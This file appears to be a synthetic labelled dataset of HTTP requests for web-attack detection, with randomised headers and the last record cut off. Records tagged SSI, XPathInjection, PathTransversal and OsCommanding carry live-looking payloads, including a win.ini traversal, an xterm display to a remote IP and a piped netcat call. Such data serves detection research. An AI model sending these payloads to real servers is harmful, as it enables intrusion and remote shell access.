Cookie: FFvVGAnCAnode=668;eibmmyOtRbelf=winntqst8Hthtdeletenetcattnodenz ae;rneid=rDF;L0ahpwF_=033;mp3synodoset=6192
Cookie2: $Version="5"
Date: Wed, 11 Feb 09 10:28:01 UTC
ETag: W/"PBQsQmQZlKxLVko"
Expect: Stu6fO
From: vksFfwla@1brae8.com
If-Modified-Since: Mon, 09 Jun 08 16:29:49 CET
If-Unmodified-Since: Tue, 16 Mar 10 21:02:39 UTC
If-Match: "omuoVVQGaVTd6GGyR"
If-None-Match: *
If-Range: Sat, 15 May 04 22:44:42 CET
Max-Forwards: 23
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM ZUkxZXlvcnNhbjhhcmVpYTNsbGhhMWZsb3NodjVmZjRyYXY3
Authorization: Digest response="1b2DB27CCF9dE6E6F44d8e6a8EEDF329"
Range: 573445-27087,-40251
Referer: /g6pEpsqi/jfalk/ssthigoe/2ESse/eva6.mdb
TE: gzip;q=0.5,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.2 (X11; U; Solaris 6.3; a0-xo; rv:0.2.6) Gecko/42762889
UA-CPU: PowerPC
UA-Disp: 755,529,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: HTTP/6.9 238.125.154.165, 6.1 22.79.236.47
Transfer-Encoding: identity
Upgrade: syagel/7.4, wae/1.3
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 110.4.41.253
X-Serial-Number: 4249614312362158832
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29263
Start - Id: 39227
class: SSI
GET /xite/dwTgjoy1eneestdsrec9/.j9aldocumentQpKOhPbp7/z@n_AeN/p_Rrr/irlotdorIuaev9s/ofEecrt9eeLa4slyP.asp?wertrnousS9k=fI0RzdNUN&7h5dUEi=h%3A3e8&9TXrnJsK=1+nsxnisekoewehiNhttp%40&s5ketc8SdocumentKO=tL1UY&eHWjME8Acat2DI=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&us3h1Ieaonsehe=stwledcrhsnn&asna=ceifCWFT&Af3t3to=aanh&iA2CvnXc=emochatnE&Gnutuivoi3zhzt=y%3Dobjectoos%3At&7Geeninqb6ng=onms3o%5DAum&ne=%3Dt&raelsaNo6=hm6aa&m202=3521049762 HTTP/1.0
Host: www.nhuemdogux.biz
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-5;q=0.8, koi8-r;q=0.7, iso-8859-3
Accept-Encoding: deflate;q=0.5
Accept-Language: qwbrrrt-nnf0to, am-aset, 33t-se, i9zNaini-Mbrl
Cache-Control: no-transform
Client-ip: 98.18.205.234
Cookie: cnta=m;sek=shIoa;tsNo=696943365;twttmtee5=oHe;1h7n=a~q
Cookie2: $Version="798"
Date: Sat, 11 Dec 04 14:14:49 CET
ETag: W/"SEciDHf1YaSpWifciL1"
Expect: 100-continue
From: en6rC0@ulle.be
If-Modified-Since: Sun, 29 Feb 04 24:32:37 CET
If-Unmodified-Since: Sun, 19 Feb 06 14:09:42 UTC
If-Match: *
If-None-Match: "8jiRe3teWYYD4tF"
If-Range: Sat, 12 Nov 05 07:27:47 UTC
Max-Forwards: 4494
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: ti6m Oeyaeh=euifee
Range: 5-9725,-6683
Referer: http://www.3rdwen.org/vdiltp.jpg
TE: trailers,gzip;q=0.2,deflate;q=0.3
Trailer: Pragma
User-Agent: Mozilla/0.1 (X11; U; Linux i386 5.2; ta-oe; rv:4.1.7) Gecko/82971516
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x400
Via: bd5/6.4 216.60.178.231, HTTP/8.9 155.67.2.10:34
Transfer-Encoding: identity
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 958 123.14.249.170 "sas1itf7cinirnEuos" 
X-Forwarded-For: 252.9.253.184
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39227
Start - Id: 12099
class: Valid
GET /XkNCDpositionj5XinU0dXP/dDaERQ8Dj2/r4itetq5sbeenab8adon/6lt_I7Qk9dcrN-A04/JRrB4yds/dhnyeo0hdseu3/5oeoepebErr5/exp92PeQ-8qnQK/aWHwMPkFLJAKP9MRPv_b/81E7Qrn2U.png? HTTP/1.1
Host: www.eiTooocNrx.org
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.3
Accept-Encoding: deflate, gzip;q=0.3, compress;q=0.9, deflate, deflate;q=0.8
Accept-Language: *;q=0.1
Cache-Control: max-age=7
Client-ip: 222.100.224.249
Cookie: or5Uhlnewva=s_QgZBe;2a=rr;6e=aiaaceX;tt=s7;us9esl=r.5xp9s.yO
Cookie2: $Version="4"
Date: Sun, 20 Aug 06 03:19:40 CET
ETag: "B_yWLx.fRRhYiw6gV"
Expect: Epfsht
From: nj6pNha@dohie.ch
If-Modified-Since: Mon, 28 May 07 17:20:22 GMT
If-Unmodified-Since: Thu, 19 Feb 09 17:40:21 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Jan 07 24:20:10 CET
Max-Forwards: 591
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: tdsfn gn6Hi=ruDos9tw
Authorization: Digest uri=/l557jsoh.php
Range: 320-,-2,3-504
Referer: http://www.0atrdwe.be/eiL6e5n/veli4ya/CaeiesU/dntuwn4.sh
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/9.1 (Windows; U; Win 9x 6.5; fv-mm; rv:4.1.7) Gecko/57843194
UA-CPU: Sparc
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6469x6483
Via: 3.3 www.nt5ntf.shtml, dTE4at/9.7 www.ecpsthut.png:3809
Transfer-Encoding: deflate
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 222.31.114.163
X-Serial-Number: 739755
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12099
Start - Id: 49813
class: XPathInjection
GET /8edzDssoteyPtutle/njiOtoonnjsmlerg/ol6gnrieojO.asp?eeptednTeuet=8dlnd%2Fh%2Fs%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D4%5D+++++%7C++++6ck%2FIthD%2Fhdiwgi%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D49%5D+++or+++++%27neAiNx%27+++%3D+%27&cwiamamqpenyyi=athg3rwSo HTTP/1.0
Host: www.qenbmixt.uk
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.6, us-ascii, big5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=4
Client-ip: 248.234.57.173
Cookie: ubgsoundNt_0qhZ=151;lreecneahtE=n7ld<;u1eag3h=133888;-CDk3=10;hefru=s9crdhEs-tlsunion
Cookie2: $Version="04"
Date: Sat, 05 Dec 09 07:50:50 UTC
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Sun, 07 Jan 07 24:55:54 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 03:20:11 GMT
Max-Forwards: 548
MIME-Version: 7.3
Pragma: es=nEg6ln
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: hbE9e eiza=ioIeete
Range: -786962,-08955,08-
Referer: http://yr1oi.de/5A5s/yxfa.cfm
TE: gzip;q=0.4,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: os7nesDih8 (tPpaZ4diRn)
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: 4.4 234.87.5.77:8664, 0.2 39.228.80.180, 0.8 116.94.125.101
Transfer-Encoding: identity
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 153.152.40.255
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49813
Start - Id: 12513
class: Valid
GET /gn/nsPLVs0PtqQ/9X3nhv/IQg/Ntahh/7aBOuMkpsjo/pnnlesiecweezIolih/o3loutN0tebs/taE/tzdTs.nFx9buA.w/srmilfA.js? HTTP/1.1
Host: www.5nwsenrd3.it:018
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: x-mac-icelandic;q=0.3, iso-8859-6;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=80
Client-ip: 132.173.244.118
Cookie: ilq=mfN;thSta=t3h5Wg;iptaalenelwnAdt=a-mIVa_Sj;ei6amieamc=s+4
Cookie2: $Version="9"
Date: Sun, 31 Aug 08 02:53:36 GMT
ETag: W/"Xr-@6gcRG0oeydpwL"
Expect: ttajmaTs
From: deAe@iiia.st
If-Modified-Since: Thu, 18 Mar 04 02:49:29 UTC
If-Unmodified-Since: Thu, 04 Dec 08 17:31:17 GMT
If-Match: "F-m_dZWZolid0nx7.n"
If-None-Match: "h2Hw6QeWEgUFqA3WjpN"
If-Range: *
Max-Forwards: 515
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest qop=tlainatN
Authorization: Basic ZGNubzpvbmVh
Range: 9895-033107
Referer: http://Nrdzi.gov/ancomen.php
TE: trailers
Trailer: Authorization
User-Agent: 5KUNz8SUmT http://www.reae.ch
UA-CPU: MIPS
UA-Disp: 634,9417,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 388x558
Via: 5.6 194.89.203.132, nile16/9.6 www.ntihi.css, 3.8 101.71.171.174
Transfer-Encoding: af6ntt
Upgrade: hbxi/8.3
Warning: 308 212.140.37.183 "tnstnwlHnrwl" 
X-Forwarded-For: 76.244.65.161
X-Serial-Number: 2197491883894
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 12513
Start - Id: 24296
class: Valid
GET /dKHU09gXSvyJKfEnJ/ch1eanfRjstuo/mTk_teETxpuoYlxsK6H./lIhiNf0seos5/reeoacriI7rhinlyjRi.js?5p=IggeT&FKukasr=xntnsc&rhrR2i=+%244o&rntlietr=v892sT%40qY&elHetsuj=64&PSb6w=f&cei=421991&70em=eByj1hO3rp&.FsQaJtz.Xmw=3&fn8H=Auhuq5&Srn7Elah19=6873&tstj7tnlNter=0618719687 HTTP/1.1
Host: www.eh4wt.ch:80
Connection: keep-alive
Accept: text/*, application/*, video/mpeg;q=0.4
Accept-Charset: us-ascii;q=0.5, windows-1252;q=0.8
Accept-Encoding: identity
Accept-Language: 39-ee, ap-sfbtaa5t;q=0.0, dsl-i19mlidk;q=0.9
Cache-Control: min-fresh=7
Client-ip: 123.201.157.28
Cookie: nJYgowmpeeode=eee9eHgtynhbe
Cookie2: $Version="488"
Date: Sun, 19 Feb 06 24:50:55 GMT
ETag: "9MdykHut-67CUwu7k.9"
Expect: totv2sh
From: somsctd@slielEozga.ch
If-Modified-Since: Sat, 07 Oct 06 19:47:41 CET
If-Unmodified-Since: Mon, 26 Apr 04 02:58:03 GMT
If-Match: "2j@Nh1j2TD.ON.A"
If-None-Match: "5-JORt4ztpSQv-Fp"
If-Range: Fri, 03 Nov 06 06:27:41 UTC
Max-Forwards: 5
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: mabR seao=oeest
Range: -375
Referer: http://www.qe1dbboe.org/sunn/gttab/ofpdec/TYnm8tr.wav
TE: gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.5 (Windows; U; Win 9x 4.9; ha-re; rv:8.4.4) Gecko/47362276
UA-CPU: 68000
UA-Disp: 298,2498,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 982x566
Via: 1.6 69.1.9.129, HTTP/4.4 www.eathd4r.css
Transfer-Encoding: gzip
Upgrade: dshm/8.6, oet/0.5, seki/1.5, v7narE/5.0, 68osso/4.4
Warning: 494 13.80.115.26:79 "esgjTrwOnjs" "Wed, 07 Oct 09 24:18:13 UTC"
X-Forwarded-For: 86.231.25.73
X-Serial-Number: 26590615191499
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24296
Start - Id: 48696
class: XPathInjection
PUT /ceE@qXIM-VDAed/oW2CluXF8HbTnSSP1hM/rLE0OCUL6@x/z8irseheesixLttp/em0ismrmyeayete7g/8ucA8t4/httpsY@OZ/OoptO4O-LG/aRCpA/wRW3ADGaw/I2Eanoh.nsf? HTTP/1.0
Content-Length: 307
Content-Language: sihEwo,ie,oq
Content-Encoding: compress
Content-Location: http://gfhuej.fr/utlh/oeotere/naoa/aaEsh/rebhos1.dll
Content-MD5: MHByMnV0YWUwdXRtd2h0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Sat, 10 Jan 09 12:23:06 GMT
Host: 200.188.10.68
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.42.128.3
Cookie: ssnSaesdln=d6dUS;nneh54s84EsimL=22969;OB@_optd@childNBgR=sSTioczFtet8xIra9%x;ip=document5l?;tiLea7cxejo7e15=Ltm1Iar;5Djl=gvbU
Cookie2: $Version="590"
Date: Sat, 06 Aug 05 20:44:44 CET
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oiaydiik=Cesre;ani7=heeoad
From: i1istd@23tm.net
If-Modified-Since: Sat, 18 Feb 06 11:23:30 UTC
If-Unmodified-Since: Mon, 05 Jan 04 13:43:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.4
Pragma: e='ieeT'
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Range: 569156-2482
Referer: http://www.ogieya.biz/oru4/hweh1o/ev4itvcs.asp
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: te-Ymxk0 http://www.hN8Hs3.ch
UA-CPU: MIPS
UA-Disp: 527,267,32
UA-Color: color8
UA-Pixels: 640x9904
Via: 5.2 96.130.108.219, 4.0 230.93.196.168:3142, fT9/2.1 www.tuyssr.htm
Transfer-Encoding: compress
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 243.139.91.251
X-Serial-Number: 3185085450816900238
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9tb=escsdidlike ihn&fluusatfaeodte=5575&xrearf9da=71577064&dmnuifHe=(i    <     count(Aiy9xb/child::text()) and j  <  count(bSa9uw/child::comment())   and     k     <     count(7Spt/child::*)   )&6s7yrlaHsKperlN=hseenstSshee&wjyAt=&dwupdate&b48oliaq=tR7iocd

End - Id: 48696
Start - Id: 20568
class: Valid
GET /oyh7O0lT0Bxak82nz-yE/nms_BPdo/eteodeatunOicshgezed/oARMB6hQ@J/wmItasHhebgweiga/wlortfktXra/tbUBDQ3v4/RqrS/nhxehtjtd.cgi? HTTP/1.0
Host: www.wlla.fr
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: cp-950;q=0.0, cp-932;q=0.1, shift_jis, x-mac-chinesetrad;q=0.7, iso-10646-ucs-2
Accept-Encoding: deflate, gzip;q=0.7, compress
Accept-Language: 8snael-eenE;q=0.1, Govn-4meee2f6;q=0.8
Cache-Control: no-store
Client-ip: 231.122.134.222
Cookie: AWz2w@mocha=9887;Gauyhsri1ttene=0991629;iosvw30Mses4p=903;Gbsselectftp5=8cneua37tvEnasn
Cookie2: $Version="407"
Date: Tue, 12 Sep 06 13:27:28 CET
ETag: "noNH.XI2YLHZorj"
Expect: ruigm0oi=yotntt;wytfaT=Fef6e
From: Ioie@Fghaaio.net
If-Modified-Since: Wed, 07 Jun 06 05:59:40 UTC
If-Unmodified-Since: Wed, 29 Sep 04 10:09:48 CET
If-Match: *
If-None-Match: "y9XN-SYCDDxashzs"
If-Range: Fri, 26 May 06 07:19:48 CET
Max-Forwards: 01
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic ZG5kYTF0dEY6ZWVlNnV1OA==
Authorization: Basic MXN1ZWh0OnJ4cmVl
Range: 852875-5353
Referer: /nkT3ah.tar
TE: chunked;q=0.1,gzip,trailers
Trailer: Host
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 7.0; 6h-ua; rv:3.3.4) Gecko/37629501
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7369x544
Via: HTTP/6.6 www.eepns.png, FTP/6.3 231.219.78.100, afen/5.8 www.0bnSa1h.js
Transfer-Encoding: compress
Upgrade: oenMr/2.7, dlt8/0.7, qsRuu/2.7, keAsp/4.8
Warning: 257 13.243.249.249 "3a9dtgni" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20568
Start - Id: 45084
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: www.Ezoy.be
Connection: ienel
Accept: image/jpeg;q=0.9, application/zip;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 11.179.164.13
Cookie: evl4bir=42314;Ef0rj=oe7arWFhr7tse8;tckllelebd=455904
Cookie2: $Version="865"
Date: Thu, 16 Jul 09 06:16:40 CET
ETag: W/"ripDnExYI_q8e4R"
Expect: 100-continue
From: uoSnnen@oz8Aa.ch
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "Y8el-sjYmzeIAj0IW7"
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 486
MIME-Version: 9.2
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: NTLM ZWZzcGhlU3JhdGRXb2hyb3R0a3RybHpQaWVydGRpdXRkZW8=
Range: 61-,599945-,96-
Referer: http://www.tiaweo.be/fnhpo/oDett/bteamhu.php3
TE: trailers,chunked
Trailer: Connection
User-Agent: RTea/2.4
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1990x238
Via: HTTP/5.9 www.5noStnoe.png:1579, 6txea/1.9 227.39.180.139, 4.6 112.69.200.126
Transfer-Encoding: identity
Upgrade: ttpNf/8.4
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 324503957971792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45084
Start - Id: 5778
class: Valid
PUT /onBrruahehhoReuod/Nq._miframeEQ/9w4Y@R_/asot6nlaatucJbdi9fhs/ngdOeH_hdaxp_/eAsendhcehrsna/wbxjVh1Yp0/f8YscA4SBPd/i@/saD5Ln0.dll? HTTP/1.0
Content-Length: 34
Content-Language: 6ls5pATT
Content-Encoding: gzip
Content-Location: /gasl/blREodw/pdlizGe/metd/eofa.asp
Content-MD5: bHBkcklzNXJod2l2bHR0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Jun 05 18:42:49 GMT
Last-Modified: Thu, 06 Sep 07 13:07:30 GMT
Host: 249.89.35.65:80
Connection: itat
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2, x-mac-arabic;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 47.21.104.251
Cookie: 9qaegHtn=083957;PTHM6=1;tr=748208;asItdsuat7=tsx;n9et=599135415;rcvshnss=Shmamocha6eraeA
Cookie2: $Version="8"
Date: Tue, 14 Jul 09 22:57:14 GMT
ETag: "ZTOtT2PAamHslmsZ6r"
Expect: IC8awotu=ilhissh;t7trinn
From: m3eh@bebedj7nid.biz
If-Modified-Since: Sun, 28 Feb 10 15:03:12 CET
If-Unmodified-Since: Tue, 19 Aug 08 21:09:20 GMT
If-Match: "9VPzFlhxisWltL6kZ"
If-None-Match: *
If-Range: *
Max-Forwards: 419
MIME-Version: 3.6
Pragma: eehuc=aed
Proxy-Authorization: NTLM dGFvcnRvc2xyaW9nNjNycnJldHBmY3RvdnJuenRzc2hURWxt
Authorization: vnulsi otttsi=vAfdnsNh
Range: 00051-
Referer: http://www.0rbw.gov/5rarc/uStt/C9fo/enotaule/uhneOTsn.sh
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 6.0; sw-3r; rv:7.3.9) Gecko/20872686
UA-CPU: 68000
UA-Disp: 9613,3615,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2088x8163
Via: FTP/5.3 www.nhlve.tiff:5, 4.3 www.iUus.html
Transfer-Encoding: deflate
Upgrade: tgo/5.7, lybtio/8.6
Warning: 669 175.253.249.242:78324 "slmoebrsy6Uetltw" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 94351330899239471408
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9BinsertI11Mbrw=uH6erSkeep9tnqrHeo

End - Id: 5778
Start - Id: 31548
class: Valid
GET /ae/wuvra7ao.cfm? HTTP/1.1
Host: 161.62.124.80
Connection: tfamEsc
Accept: video/*, application/*, video/mpeg
Accept-Charset: windows-1255;q=0.0, windows-874, iso-8859-5;q=0.3, cp-936;q=0.1, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=87
Client-ip: 234.66.106.126
Cookie: tRJghollinku=aWsO_t9j;etnmDeartna=8;ycdxarestBp=k f:;~;xf2Rldec=4693685
Cookie2: $Version="712"
Date: Tue, 09 Feb 10 19:05:35 GMT
ETag: W/"w4kvgE8p5Yau4wovab"
Expect: 100-continue
From: hlyrn9n@fimlaeyny.st
If-Modified-Since: Sat, 25 Nov 06 05:01:17 CET
If-Unmodified-Since: Fri, 13 Jan 06 20:43:14 CET
If-Match: "DmADQ8BMyFfbQtj8eRA"
If-None-Match: *
If-Range: *
Max-Forwards: 3645
MIME-Version: 3.2
Pragma: s='lIi7o'
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: Basic M3RuZWU6dHV3aXJwZXI=
Range: -2245
Referer: http://www.EyoknaE.it/mEioah/iaamae/vaio5anE/v78o.tiff
TE: chunked,trailers,trailers
Trailer: Via
User-Agent: Wiuth (6rkyAjf; mmYIDeZfxj; hDD683pB)
UA-CPU: x86
UA-Disp: 201,1395,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8565x5206
Via: HTTP/4.9 91.197.233.180, 6.2 100.171.65.165
Transfer-Encoding: seisc
Upgrade: iwe/8.2, ep3eof/7.6, paia/0.4, e4dhI/1.4
Warning: 689 www.wdmoC1.shtml "mbnuzeaMsiesfenia" 
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 7616561595248452
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31548
Start - Id: 42977
class: OsCommanding
GET /bTLwzkoPZv/olepgaey8svEieneu/eT/yupttdsds4lUu2nance/sbD9uefqei4p.js? HTTP/1.0
Host: www.3ecet.gov:96393
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Cookie: yOoeE=yKy;in=iSiljeat&Ds<;QWxtermT5H1xZ4ze=jcw AoweROtwgetSl;mt6elbetemEdni=\r     xterm -display    42.71.67.6:0.0;rsr8iey6eo=oittnter
Cookie2: $Version="4"
Date: Sun, 25 Jan 04 24:32:48 GMT
ETag: "j-fPw5VJJMXmC7u8kvpN"
Expect: ioOt=7ort
If-Modified-Since: Tue, 24 Apr 07 04:13:11 UTC
If-Unmodified-Since: Sun, 08 Oct 06 03:48:05 GMT
If-None-Match: "IycbknRr@DbX.1@M"
If-Range: Sun, 23 Aug 09 13:44:01 UTC
Max-Forwards: 896
MIME-Version: 5.3
Pragma: fmemwdir=i
Proxy-Authorization: Efle esuaEdos=0iega
Authorization: Digest realm
Range: 764909-392342,0-,-78442
Referer: /sm8ln2r.aspx
TE: trailers,trailers,deflate;q=0.6
User-Agent: Mozilla/8.5 (compatible; Konqueror/4.5; Linux i386; 3deRxueb0; oi7etmtjww)
UA-CPU: x86
UA-Disp: 2237,4144,16
UA-OS: Linux
UA-Color: color32
Via: 1.2 www.5saaxuE.css, iig/3.6 115.142.109.255, 1.7 233.159.14.114
----: ----------------------------------------

null

End - Id: 42977
Start - Id: 43109
class: OsCommanding
GET /f0deRj8on/BT8IeeKpX_TmJC./20L.Lz@5y/t9iys0g2eaee.pl?Ieserhslze=whereeIan8e%2FneaaoaemoptI&teIetonaoTtc0in=eTKQRx2ZN&nqVY=757&ne=h6ihetp9aStha&SAINLhOh-orGV=%7C++++%2Fusr%2Fbin%2Fnc++++-vvv+110.115.123.204+++80%2500&2aEo7nsoeyi=F%3Ae&ndsai=z%25E%28 HTTP/1.1
Host: 21.225.161.2
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.0, iso-8859-3, iso-10646-ucs-2;q=0.6, euc-tw;q=0.1, cp-932
Accept-Encoding: 
Accept-Language: tWoija-neae4t4, m9-eL
Cache-Control: only-if-cached
Client-ip: 246.16.85.161
Cookie: itisEbtohe=iBX9fbNh@m
Cookie2: $Version="389"
Date: Mon, 02 May 05 18:25:14 UTC
ETag: W/"Q0dp4K9tAGu3DIBKEsFr"
Expect: eNyuA=ansia;nfrWso
From: OhAzntE@715eiieu6.uk
If-Modified-Since: Wed, 08 Jul 09 21:26:33 UTC
If-Unmodified-Since: Mon, 30 Aug 04 05:38:48 GMT
If-Match: "mxBP9BG8Ob6JSSZId"
If-None-Match: *
If-Range: *
Max-Forwards: 739
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: iwt7 3rBen=urehn5nI
Authorization: roeche l7ANc=uohahjE
Referer: http://87edsq.gov/todre/an15mGee/csi1geH9/rs0i9nSs/s4AmeBa.css
TE: trailers,chunked;q=0.0
Trailer: Connection
User-Agent: 1aaIcoa1ssat
UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Pixels: 603x2268
Via: 8.6 226.162.98.48:2980, 5.7 www.annsUht.png, FTP/3.6 235.95.163.203
Transfer-Encoding: rsfy
Upgrade: Fgohbd/4.1
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43109
Start - Id: 8959
class: Valid
GET /f7desdtdn1loErWmcz/akT/smZeQ1Wlad/eemhii/6Gqc8VEed3UdzQ/tYNSG1.nsf?Yg3R=3Too5A2atdr5wdes1p HTTP/1.0
Host: www.0hst.uk
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: windows-1254, windows-1251;q=0.4, windows-1251;q=0.3, windows-1258;q=0.6, iso-2022-kr;q=0.8
Accept-Encoding: compress;q=0.9, identity;q=0.9, deflate, identity;q=0.3, identity;q=0.9
Accept-Language: *;q=0.7
Cache-Control: min-fresh=359
Client-ip: 241.186.166.112
Cookie: hcghokoDb=cYhk0
Cookie2: $Version="894"
Date: Mon, 09 Feb 09 18:47:45 UTC
ETag: "FIGwzlov_YY1FTvn"
Expect: 100-continue
From: enona@meryupld.st
If-Modified-Since: Fri, 29 Feb 08 12:33:25 GMT
If-Unmodified-Since: Tue, 08 Nov 05 01:05:36 GMT
If-Match: "esB-ejEmcykgp.b_nLaw"
If-None-Match: "0IAqx5vw_96h6q2k"
If-Range: "TPW@E4reRX28VCcgL5T5"
Max-Forwards: 6
MIME-Version: 7.6
Pragma: y0epe='ckg'
Proxy-Authorization: tNnw Thot=heMot0um
Authorization: Basic cmVyZWw6cmNkT3UwZA==
Range: 0331-,4394-646932
Referer: /tpqetnae/hTedeh/isthn.pdf
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: n1EtmyarhOowoa6i
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 557x3497
Via: Tru/5.0 37.64.28.240, FTP/3.9 151.198.223.96:0
Transfer-Encoding: deflate
Upgrade: neh6ae/0.8, ua61t/0.4, pduRa/4.8, slsp/5.5
Warning: 115 252.241.30.131:98284 "fahxv" "Sun, 11 Jul 04 18:03:29 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 982389544
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8959
Start - Id: 8958
class: Valid
GET /Ca/lxZ/eDFT7gK74e2uR/aJ0LqV8mkgRr6..asmx?tasthopna=ai&iTd93lnoel=303&aveolnItaiodER=oiQeUbessaulr&7iv=533235356&oosdprm=sesi HTTP/1.1
Host: www.faigacjt.net:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew, x-mac-hebrew, windows-1253, x-mac-greek
